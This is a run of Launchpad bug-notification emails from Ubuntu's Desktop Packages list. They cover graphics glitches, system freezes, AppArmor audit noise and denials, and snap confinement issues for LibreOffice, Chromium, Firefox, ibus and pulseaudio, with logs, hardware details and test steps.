*** This bug is a duplicate of bug 1841718 *** https://bugs.launchpad.net/bugs/1841718 After a little more investigation, this is resolved on https://bugs.launchpad.net/fedora/+source/xserver-xorg-video- ati/+bug/1841718 and the fix is currently in ppa:canonical-x/x-staging ** This bug has been marked a duplicate of bug 1841718 [radeon] Rendering of combo boxes and tooltips is broken -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to xserver-xorg-video-ati in Ubuntu. https://bugs.launchpad.net/bugs/1860282 Title: corrupted desktop tooltips Status in xserver-xorg-video-ati package in Ubuntu: Confirmed Bug description: Desktop tooltips (also browser, apps etc.) are distorted and corrupted for old AMD cards after latest system update and possibly xorg update. Is this a xorg related problem? System Info: https://termbin.com/tzn3 And this is a screencasting of the problem: https://youtu.be/iutIwrM_Lz0 This is my glxinfo: https://pastebin.com/AMUyf3xa PS In linux mint forums there is a bypass of the problem by reverting back to LTS graphic stack, which indeed it works: apt install xserver- xorg xserver-xorg-video-all To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/xserver-xorg-video-ati/+bug/1860282/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1860282] Re: corrupted desktop tooltips
I am also seeing the same thing as the screencast. It can be reproduced with tooltips and the Alt+Tab window. Graphics card: Advanced Micro Devices, Inc. [AMD/ATI] Barts XT [Radeon HD 6870] Driver package: xserver-xorg-video-ati-hwe-18.04/bionic-updates,now 1:19.0.1-0ubuntu1~18.04.1 -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to xserver-xorg-video-ati in Ubuntu. https://bugs.launchpad.net/bugs/1860282 Title: corrupted desktop tooltips Status in xserver-xorg-video-ati package in Ubuntu: Confirmed Bug description: Desktop tooltips (also browser, apps etc.) are distorted and corrupted for old AMD cards after latest system update and possibly xorg update. Is this a xorg related problem? System Info: https://termbin.com/tzn3 And this is a screencasting of the problem: https://youtu.be/iutIwrM_Lz0 This is my glxinfo: https://pastebin.com/AMUyf3xa PS In linux mint forums there is a bypass of the problem by reverting back to LTS graphic stack, which indeed it works: apt install xserver- xorg xserver-xorg-video-all To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/xserver-xorg-video-ati/+bug/1860282/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1798961] Re: Random unrecoverable freezes on Ubuntu 18.10
Happening to me too. Full details available on this issue: https://github.com/brave/brave-browser/issues/7439 ** Bug watch added: github.com/brave/brave-browser/issues #7439 https://github.com/brave/brave-browser/issues/7439 -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to xserver-xorg-video-intel in Ubuntu. https://bugs.launchpad.net/bugs/1798961 Title: Random unrecoverable freezes on Ubuntu 18.10 Status in Linux: New Status in linux package in Ubuntu: Confirmed Status in xserver-xorg-video-intel package in Ubuntu: Invalid Status in linux source package in Bionic: Triaged Status in xserver-xorg-video-intel source package in Bionic: Invalid Status in linux source package in Cosmic: Triaged Status in xserver-xorg-video-intel source package in Cosmic: Invalid Status in linux source package in Disco: Triaged Status in xserver-xorg-video-intel source package in Disco: Invalid Bug description: First thing I notice is that the mouse cursor freezes as I'm using it, then I hit the CAPS LOCK key and the LED indicator doesn't respond. Then I try the "REISUB" command, but it doesn't do anything either. Only a hard reset works, pressing down the power button for a few seconds. How to reproduce? I couldn't figure out a consistent method. It is still random to me. Version: Ubuntu 4.18.0-10.11-generic 4.18.12 System information attached. Also happens under Arch Linux and Fedora. I've talked to another user on IRC who seems to be having the same freezes. ProblemType: Bug DistroRelease: Ubuntu 18.10 Package: linux-image-4.18.0-10-generic 4.18.0-10.11 ProcVersionSignature: Ubuntu 4.18.0-10.11-generic 4.18.12 Uname: Linux 4.18.0-10-generic x86_64 ApportVersion: 2.20.10-0ubuntu13 Architecture: amd64 AudioDevicesInUse: USERPID ACCESS COMMAND /dev/snd/controlC1: dsilva 1213 F pulseaudio /dev/snd/controlC0: dsilva 1213 F pulseaudio CurrentDesktop: XFCE Date: Sat Oct 20 09:54:50 2018 InstallationDate: Installed on 2018-10-20 (0 days ago) InstallationMedia: Xubuntu 18.10 "Cosmic Cuttlefish" - Release amd64 (20181017.2) MachineType: Dell Inc. Inspiron 5458 ProcFB: 0 inteldrmfb ProcKernelCmdLine: BOOT_IMAGE=/vmlinuz-4.18.0-10-generic root=/dev/mapper/xubuntu--vg-root ro quiet splash vt.handoff=1 RelatedPackageVersions: linux-restricted-modules-4.18.0-10-generic N/A linux-backports-modules-4.18.0-10-generic N/A linux-firmware 1.175 RfKill: 0: phy0: Wireless LAN Soft blocked: no Hard blocked: no SourcePackage: linux UpgradeStatus: No upgrade log present (probably fresh install) dmi.bios.date: 02/02/2018 dmi.bios.vendor: Dell Inc. dmi.bios.version: A15 dmi.board.name: 09WGNT dmi.board.vendor: Dell Inc. dmi.board.version: A00 dmi.chassis.type: 9 dmi.chassis.vendor: Dell Inc. dmi.modalias: dmi:bvnDellInc.:bvrA15:bd02/02/2018:svnDellInc.:pnInspiron5458:pvr01:rvnDellInc.:rn09WGNT:rvrA00:cvnDellInc.:ct9:cvr: dmi.product.name: Inspiron 5458 dmi.product.sku: Inspiron 5458 dmi.product.version: 01 dmi.sys.vendor: Dell Inc. To manage notifications about this bug go to: https://bugs.launchpad.net/linux/+bug/1798961/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1849680] Re: audit spam in dmesg (libreoffice)
For the next libreoffice upload, the non-/home read-only accesses all look fine to add to the libreoffice profile. -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to libreoffice in Ubuntu. https://bugs.launchpad.net/bugs/1849680 Title: audit spam in dmesg (libreoffice) Status in libreoffice package in Ubuntu: New Bug description: My dmesg is getting flooded by apparmor audit messages, mostly from libreoffice (profiles libreoffice-soffice and libreoffice-oosplash): $ dmesg | tail -n 25 [13682.452555] audit: type=1400 audit(1571920851.001:3672): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/drirc.d/00-mesa-defaults.conf" pid=17792 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 [13682.453430] audit: type=1400 audit(1571920851.001:3673): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/drirc.d/00-mesa-defaults.conf" pid=17792 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 [13682.453933] audit: type=1400 audit(1571920851.001:3674): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/libdrm/amdgpu.ids" pid=17792 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 [13682.455491] audit: type=1400 audit(1571920851.005:3675): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/home/chris/.cache/mesa_shader_cache/index" pid=17792 comm="soffice.bin" requested_mask="wrc" denied_mask="wrc" fsuid=1000 ouid=1000 [13682.604100] audit: type=1400 audit(1571920851.153:3676): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/home/chris/.local/share/gvfs-metadata/smb-share:server=buddha,share=chris" pid=17791 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=1000 [13682.604138] audit: type=1400 audit(1571920851.153:3677): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/home/chris/.local/share/gvfs-metadata/smb-share:server=buddha,share=chris-22028640.log" pid=17791 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=1000 [13683.097648] audit: type=1400 audit(1571920851.645:3678): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/home/chris/.mozilla/firefox/vq2zzheq.chris-2019-09/cert8.db" pid=17791 comm="soffice.bin" requested_mask="w" denied_mask="w" fsuid=1000 ouid=1000 [16676.510664] kauditd_printk_skb: 1210 callbacks suppressed [16676.510665] audit: type=1400 audit(1571923845.047:4889): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/drirc.d/00-mesa-defaults.conf" pid=18543 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 [16676.511473] audit: type=1400 audit(1571923845.047:4890): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/drirc.d/00-mesa-defaults.conf" pid=18543 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 [16676.550636] audit: type=1400 audit(1571923845.087:4891): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/drirc.d/00-mesa-defaults.conf" pid=18543 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 [16676.551394] audit: type=1400 audit(1571923845.087:4892): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/drirc.d/00-mesa-defaults.conf" pid=18543 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 [16676.552145] audit: type=1400 audit(1571923845.087:4893): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/drirc.d/00-mesa-defaults.conf" pid=18543 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 [16676.552568] audit: type=1400 audit(1571923845.087:4894): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/libdrm/amdgpu.ids" pid=18543 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 [16676.553912] audit: type=1400 audit(1571923845.091:4895): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/home/chris/.cache/mesa_shader_cache/index" pid=18543 comm="soffice.bin" requested_mask="wrc" denied_mask="wrc" fsuid=1000 ouid=1000 [16694.388901] audit: type=1400 audit(1571923862.923:4896): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/proc/18541/mountinfo" pid=18541 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=1000 [16694.388972] audit: type=1400 audit(1571923862.923:4897): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/proc/18541/cgroup" pid=18541 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=1000 [16694.388992] audit: type=1400 audit(1571923862.923:4898): apparmor="ALLOWED" operation="open"
[Desktop-packages] [Bug 1849680] Re: audit spam in dmesg (libreoffice)
libreoffice ships this profile, so the bug should be tracked there. ** Package changed: apparmor (Ubuntu) => libreoffice (Ubuntu) -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to libreoffice in Ubuntu. https://bugs.launchpad.net/bugs/1849680 Title: audit spam in dmesg (libreoffice) Status in libreoffice package in Ubuntu: New Bug description: My dmesg is getting flooded by apparmor audit messages, mostly from libreoffice (profiles libreoffice-soffice and libreoffice-oosplash): $ dmesg | tail -n 25 [13682.452555] audit: type=1400 audit(1571920851.001:3672): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/drirc.d/00-mesa-defaults.conf" pid=17792 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 [13682.453430] audit: type=1400 audit(1571920851.001:3673): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/drirc.d/00-mesa-defaults.conf" pid=17792 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 [13682.453933] audit: type=1400 audit(1571920851.001:3674): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/libdrm/amdgpu.ids" pid=17792 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 [13682.455491] audit: type=1400 audit(1571920851.005:3675): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/home/chris/.cache/mesa_shader_cache/index" pid=17792 comm="soffice.bin" requested_mask="wrc" denied_mask="wrc" fsuid=1000 ouid=1000 [13682.604100] audit: type=1400 audit(1571920851.153:3676): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/home/chris/.local/share/gvfs-metadata/smb-share:server=buddha,share=chris" pid=17791 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=1000 [13682.604138] audit: type=1400 audit(1571920851.153:3677): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/home/chris/.local/share/gvfs-metadata/smb-share:server=buddha,share=chris-22028640.log" pid=17791 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=1000 [13683.097648] audit: type=1400 audit(1571920851.645:3678): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/home/chris/.mozilla/firefox/vq2zzheq.chris-2019-09/cert8.db" pid=17791 comm="soffice.bin" requested_mask="w" denied_mask="w" fsuid=1000 ouid=1000 [16676.510664] kauditd_printk_skb: 1210 callbacks suppressed [16676.510665] audit: type=1400 audit(1571923845.047:4889): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/drirc.d/00-mesa-defaults.conf" pid=18543 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 [16676.511473] audit: type=1400 audit(1571923845.047:4890): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/drirc.d/00-mesa-defaults.conf" pid=18543 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 [16676.550636] audit: type=1400 audit(1571923845.087:4891): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/drirc.d/00-mesa-defaults.conf" pid=18543 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 [16676.551394] audit: type=1400 audit(1571923845.087:4892): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/drirc.d/00-mesa-defaults.conf" pid=18543 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 [16676.552145] audit: type=1400 audit(1571923845.087:4893): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/drirc.d/00-mesa-defaults.conf" pid=18543 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 [16676.552568] audit: type=1400 audit(1571923845.087:4894): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/libdrm/amdgpu.ids" pid=18543 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 [16676.553912] audit: type=1400 audit(1571923845.091:4895): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/home/chris/.cache/mesa_shader_cache/index" pid=18543 comm="soffice.bin" requested_mask="wrc" denied_mask="wrc" fsuid=1000 ouid=1000 [16694.388901] audit: type=1400 audit(1571923862.923:4896): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/proc/18541/mountinfo" pid=18541 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=1000 [16694.388972] audit: type=1400 audit(1571923862.923:4897): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/proc/18541/cgroup" pid=18541 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=1000 [16694.388992] audit: type=1400 audit(1571923862.923:4898): apparmor="ALLOWED" operation="open"
[Desktop-packages] [Bug 1848919] Re: [snap] Permission denied on Private encrypted folder
** Changed in: apparmor Status: Triaged => In Progress -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu. https://bugs.launchpad.net/bugs/1848919 Title: [snap] Permission denied on Private encrypted folder Status in AppArmor: In Progress Status in snapd: In Progress Status in chromium-browser package in Ubuntu: Invalid Status in snapd package in Ubuntu: Triaged Bug description: When accessing the Private (/home/username/Private, Encrypted Directory) folder (e.g. via "Link save as...") it shows "Could not read contents of Private, Error opening directory ...: Permission denied" Package: chromium-browser Version: 77.0.3865.120-0ubuntu1~snap1 To manage notifications about this bug go to: https://bugs.launchpad.net/apparmor/+bug/1848919/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1482852] Re: apparmor profile usr.bin.firefox missing abstractions/ubuntu-helpers
** Package changed: apparmor (Ubuntu) => firefox (Ubuntu) -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to firefox in Ubuntu. https://bugs.launchpad.net/bugs/1482852 Title: apparmor profile usr.bin.firefox missing abstractions/ubuntu-helpers Status in firefox package in Ubuntu: New Bug description: When trying to open link to a torrent apparmor denies my bittorrent client. the log message I got is: audit: type=1400 audit(1439028251.208:1075): apparmor="DENIED" operation="exec" info="profile not found" error=-13 profile="/usr/lib/firefox/firefox{,*[^s][^h]}" name="/usr/bin /transmission-gtk" pid=32092 comm="firefox" requested_mask="x" denied_mask="x" fsuid=1000 ouid=0 Although ubuntu-helpers is included in abstractions/ubuntu-bittorrent-clients to allow x access to transmission, firefox profile also need to include abstractions/ubuntu-helpers. It is also strange that when I add definition of ubuntu-helpers to usr.bin.firefox aa-enforce fails during bootup with message Multiple definitions for hat sanitized_helper in profile (null) exist,bailing out. but when I restart it it seam to set profiles OK with no error. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/firefox/+bug/1482852/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1580463] Re: Snap blocks access to system input methods (ibus, fcitx, ...)
@Gunnar - I am preparing the focal upload now, though there is a parser bug (bug 1856738) which means I cannot use @{HOME} in the rule and instead hardcode /home/*/. This will cover all typical situations (ie, not the atypical /root/.cache/ibus...) except when the user updates /etc/apparmor.d/tunables/home.d/ to add a different directory for home. With snaps (this bug) we don't support alternate locations for /home just yet, so this is not a regression. We plan to fix that parser bug for 20.04. You may want to hold off on a 1.5.22 upload (or revert the XDG patch) until this is updated to avoid regression non-snap, ibus abstraction apparmor users with non-default home. -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to ibus in Ubuntu. https://bugs.launchpad.net/bugs/1580463 Title: Snap blocks access to system input methods (ibus, fcitx, ...) Status in ibus: Fix Released Status in apparmor package in Ubuntu: Fix Released Status in ibus package in Ubuntu: In Progress Status in im-config package in Ubuntu: Fix Released Status in snapd package in Ubuntu: Fix Released Status in apparmor source package in Xenial: Fix Released Status in im-config source package in Xenial: Fix Released Status in snapd source package in Xenial: Fix Released Status in apparmor source package in Yakkety: Fix Released Status in im-config source package in Yakkety: Fix Released Status in snapd source package in Yakkety: Fix Released Bug description: = SRU im-config = [Impact] ibus-daemon by default uses a unix socket name of /tmp/dbus-... that is indistinguishable from dbus-daemon abstract sockets. While dbus-daemon has AppArmor mediation, ibus-daemon does not so it is important that its abstract socket not be confused with dbus-daemon's. By modifying ibus-daemon's start arguments to use "--address 'unix:tmpdir=/tmp/ibus'" AppArmor can continue mediating DBus abstract sockets like normal and also mediate access to the ibus-daemon-specific abstract socket via unix rules. This also tidies up the abstract socket paths so that it is clear which are for ibus-daemon, which for dbus-daemon, etc. The upload simply adjusts 21_ibus.rc to start ibus-daemon with "-- address 'unix:tmpdir=/tmp/ibus'" and adds a comment. No compiled code changes are required. [Test Case] 1. start a unity session before updating to the package in -proposed 2. $ grep IBUS_ADDRESS ~/.config/ibus/bus/*-unix-0 IBUS_ADDRESS=unix:abstract=/tmp/dbus-Vyx8fGFA,guid=28e8e7e89f902c8d4e9d77c5557add76 3. $ lsof -p $(pidof ibus-daemon) | grep '/dbus' ibus-daem 2973 jamie8u unix 0x 0t0 29606 @/tmp/dbus-oxKYpN30 type=STREAM 4. update the package in -proposed and perform '2' and '3'. The IBUS_ADDRESSES should be the same as before 5. logout of unity, then log back in 6. $ grep IBUS_ADDRESS ~/.config/ibus/bus/*-unix-0 IBUS_ADDRESS=unix:abstract=/tmp/ibus/dbus-SpxOl8Fc,guid=06d4bbeb07614c6dffbf221c57473f4e (notice '/tmp/ibus/' in the path) 7. $ lsof -p $(pidof ibus-daemon) | grep '/dbus' ibus-daem 3471 jamie8u unix 0x 0t0 26107 @/tmp/ibus/dbus-SpxOl8Fc type=STREAM ... (notice '@/tmp/ibus/' in the path) In addition to the above, you can test for regressions by opening 'System Settings' under the 'gear' icon in the panel and selecting 'Text Entry'. From there, add an input source on the right, make sure 'Show current input source in the menu bar' is checked, then use the input source panel indicator to change input sources. Extended test case to verify input support still works in unconfined and confined applications: 1. Systems Settings Language Support, if prompted install the complete language support 2. Install Chinese (simple and traditional) 3. sudo apt-get install ibus-pinyin ibus-sunpinyin 4. logout / login 5. System Settings / Text Entry - add Chinese (Pinyin) (IBus) 6. select pinyin from the indicator 7. sudo lsof | grep ibus | grep @ # will use @/tmp/dbus-... 8. open gnome-calculator and try to type something in (should get a pop-up) 9. open evince and try to search a pdf (should get a pop up) 10. upgrade apparmor and im-config from xenial-proposed 11. logout and back in 12. sudo lsof | grep ibus | grep @ # will use @/tmp/ibus/... 13. open gnome-calculator and try to type something in (should get a pop-up) 14. open evince and try to search a pdf (should get a pop up) 15. verify no new apparmor denials [Regression Potential] The regression potential is considered low because there are no compiled code changes and because the changes only occur after ibus- daemon is restarted, which is upon session start, not package upgrade. When it is restarted, the files in ~/.config/ibus/bus/*-unix-0 are updated accordingly for other applications to pick up. This change intentionally requires a
[Desktop-packages] [Bug 1781428] Re: please enable snap mediation support
Note, there is a spread test in snapd that checks for if the mediation patches are dropped (or added). While it is fine for https://launchpad.net/bugs/1856054 to be fast tracked, this pulseaudio bug should not be marked as Fix Released before the end of year break unless you coordinate with the snapd team first so as to avoid the spread test failing when no one is around to fix it. Specifically, snapd needs: https://github.com/snapcore/snapd/pull/7885 https://github.com/snapcore/snapd/pull/7886 To be clear, the snapd deb doesn't need to be involved in any of this; it is just coordinating with upstream so the upstream CI doesn't break over the holidays. -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to pulseaudio in Ubuntu. https://bugs.launchpad.net/bugs/1781428 Title: please enable snap mediation support Status in pulseaudio package in Ubuntu: Fix Released Status in pulseaudio source package in Xenial: Fix Committed Status in pulseaudio source package in Bionic: Fix Committed Bug description: [Impact] Ubuntu 16.10 added rudimentary snap support to disable audio recording if the connecting process was a snap. By Ubuntu 18.04, something changed in the build resulting in 'Enable Snappy support: no' with audio recording no longer being mediated by pulseaudio (access to the pulseaudio socket continued to be mediated by snapd's apparmor policy). This resulted in any application with the pulseaudio interface connected to be able to also record. Ubuntu 16.04 never had mediation patches and always allowed recording when the pulseaudio interface was connected. To correct this situation but not regress existing behavior, Ubuntu 19.04's pulseaudio was updated patch to allow playback to all connected clients (snaps or not), record by classic snaps (see bug 1787324) and record by strict mode snaps if either the pulseaudio or new-in-snapd-2.41 audio-record interfaces were connected. With this change, snapd is in a position to migrate snaps to the new audio- playback and audio-record interfaces and properly mediate audio recording (see https://forum.snapcraft.io/t/upcoming-pulseaudio- interface-deprecation/13418). The patch to pulseaudio consists of adding a module, enabling it in default.pa and then when it is enabled, pulseaudio when faced with a record operation will, when the connecting process is a snap (ie, its security label (ie, apparmor label) starts with 'snap.'), query snapd via its control socket to ask if the snap is classic and if not, whether the pulseaudio or audio-record interfaces are connected. Adjusting pulseaudio in the manner does not require coordination with any release of snapd. It does need a newer version of snapd-glib, which was recently updated to 1.49 in the last SRU. [Test Case] IMPORTANT: if updating pulseaudio while the session is running, either need to reboot for the test or kill pulseaudio so it can restart with the new snap policy For unconfined applications: $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes For confined, non-snap applications: $ sudo apt-get install evince $ aa-exec -p /usr/bin/evince -- paplay /usr/share/sounds/alsa/Noise.wav && echo yes $ rm -f /tmp/out.wav ; aa-exec -p /usr/bin/evince -- parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ aa-exec -p /usr/bin/evince -- paplay /tmp/out.wav && echo "yes" yes For classic snaps: $ sudo snap install test-snapd-classic-confinement --classic $ snap run --shell test-snapd-classic-confinement $ cat /proc/self/attr/current # verify we are classic confined snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain) $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes $ exit # out of snap run --shell For strict snaps with pulseaudio: $ sudo snap install test-snapd-pulseaudio --edge $ snap connections test-snapd-pulseaudio Interface Plug Slot Notes pulseaudio test-snapd-pulseaudio:pulseaudio :pulseaudio - $ test-snapd-pulseaudio.play --help # ensure SNAP dirs are created ... $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd- pulseaudio/common/ $ test-snapd-pulseaudio.play /var/snap/test-snapd-pulseaudio/common/Noise.wav && echo yes xcb_connection_has_error() returned true yes (note, the xcb_connection_has_error() message is due to the x11 interface not being connecting which is unrelated to mediation. x11 is left out to ensure that just audio-playback/audio-record are tested) $ test-snapd-pulseaudio.record
[Desktop-packages] [Bug 1851211] Re: [snap] SoloKeys not supported by u2f-devices interface
** Changed in: snapd Status: In Progress => Fix Released -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu. https://bugs.launchpad.net/bugs/1851211 Title: [snap] SoloKeys not supported by u2f-devices interface Status in snapd: Fix Released Status in chromium-browser package in Ubuntu: Confirmed Status in snapd package in Ubuntu: Triaged Bug description: This affects the current build of the snap version of Chromium. Although it was marked as fixed in the ticket here: https://bugs.launchpad.net/ubuntu/+source/chromium- browser/+bug/1738164 it is still open. No chance to use such a key in the browser. dmesg output is: My dmesg out put shows a lot of DENIED: audit: type=1107 audit(1572541712.846:243): pid=954 uid=106 auid=4294967295 ses=4294967295 msg='apparmor="DENIED" operation="dbus_method_call" bus="system" path="/" interface="org.freedesktop.DBus.ObjectManager" member="GetManagedObjects" mask="send" name="org.bluez" pid=20568 label="snap.chromium.chromium" peer_pid=946 peer_label="unconfined" exe="/usr/bin/dbus-daemon" sauid=106 hostname=? addr=? terminal=?' [ 7036.430639] audit: type=1400 audit(1572541713.042:244): apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name="/var/lib/snapd/desktop/icons/" pid=20568 comm="chrome" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 [ 7036.430641] audit: type=1400 audit(1572541713.042:245): apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name="/var/lib/snapd/desktop/icons/" pid=20568 comm="chrome" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 [ 7049.256201] audit: type=1400 audit(1572541725.870:246): apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name="/sys/devices/pci:00/:00:15.1/i2c_designware.1/i2c-2/i2c-ELAN1200:00/0018:04F3:3022.0001/report_descriptor" pid=20568 comm="ThreadPoolForeg" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 Suggested solutions in the other tickets do not work System is Ubuntu 19.10 on an Asus UX330 --- ProblemType: Bug ApportVersion: 2.20.11-0ubuntu8.2 Architecture: amd64 CurrentDesktop: ubuntu:GNOME DRM.card0-HDMI-A-1: enabled: enabled dpms: On status: connected edid-base64: AP///wAebcxW838CAAYUAQOANR54Cq7FoldKnCUSUFQhCACzAIGAgUABAQEBAQEBAQEBGjaAoHA4H0AwIDUAEyshAAAaAjqAGHE4LUBYLEUAEyshAAAe/QA4PR5TDwAKICAgICAg/ABXMjQ0MgogICAgICAgATICAyHxTpAEAwEUEgUfEBMAIwkHB4MBAABlAwwAEAACOoAYcTgtQFgsRQATKyEAAB4BHYAYcRwWIFgsJQATKyEAAJ4BHQByUdAeIG4oVQATKyEAAB6MCtCKIOAtEBA+lgATKyEAABgAJg== modes: 1920x1080 1920x1080 1920x1080 1920x1080 1920x1080i 1920x1080i 1920x1080i 1920x1080 1920x1080i 1680x1050 1280x1024 1280x960 1280x720 1280x720 1280x720 1280x720 1024x768 800x600 720x576 720x480 720x480 720x480 720x480 640x480 640x480 640x480 DRM.card0-eDP-1: enabled: disabled dpms: Off status: connected edid-base64: AP///wAGry0nABAZAQSVHRF4ArwFolVMmiUOUFQBAQEBAQEBAQEBAQEBAQEBFDeAuHA4JEAQED4AJaUQAAAY/gBBVU8KICAgICAgICAg/gBCMTMzSEFOMDIuNyAKAII= modes: 1920x1080 DiskUsage: Filesystem Type Size Used Avail Use% Mounted on /dev/sda6 ext4 184G 35G 140G 20% /home tmpfs tmpfs 7,8G 152M 7,7G 2% /dev/shm /dev/sda6 ext4 184G 35G 140G 20% /home DistroRelease: Ubuntu 19.10 InstallationDate: Installed on 2017-09-30 (766 days ago) InstallationMedia: Ubuntu 17.04 "Zesty Zapus" - Release amd64 (20170412) Lsusb: Bus 002 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub Bus 001 Device 004: ID 8087:0a2b Intel Corp. Bus 001 Device 003: ID 0bda:58d1 Realtek Semiconductor Corp. USB2.0 HD UVC WebCam Bus 001 Device 002: ID 046d:c52b Logitech, Inc. Unifying Receiver Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub MachineType: ASUSTeK COMPUTER INC. UX330UAK Package: chromium-browser 77.0.3865.120-0ubuntu1.19.10.1 PackageArchitecture: amd64 ProcEnviron: TERM=xterm-256color PATH=(custom, no user) XDG_RUNTIME_DIR= 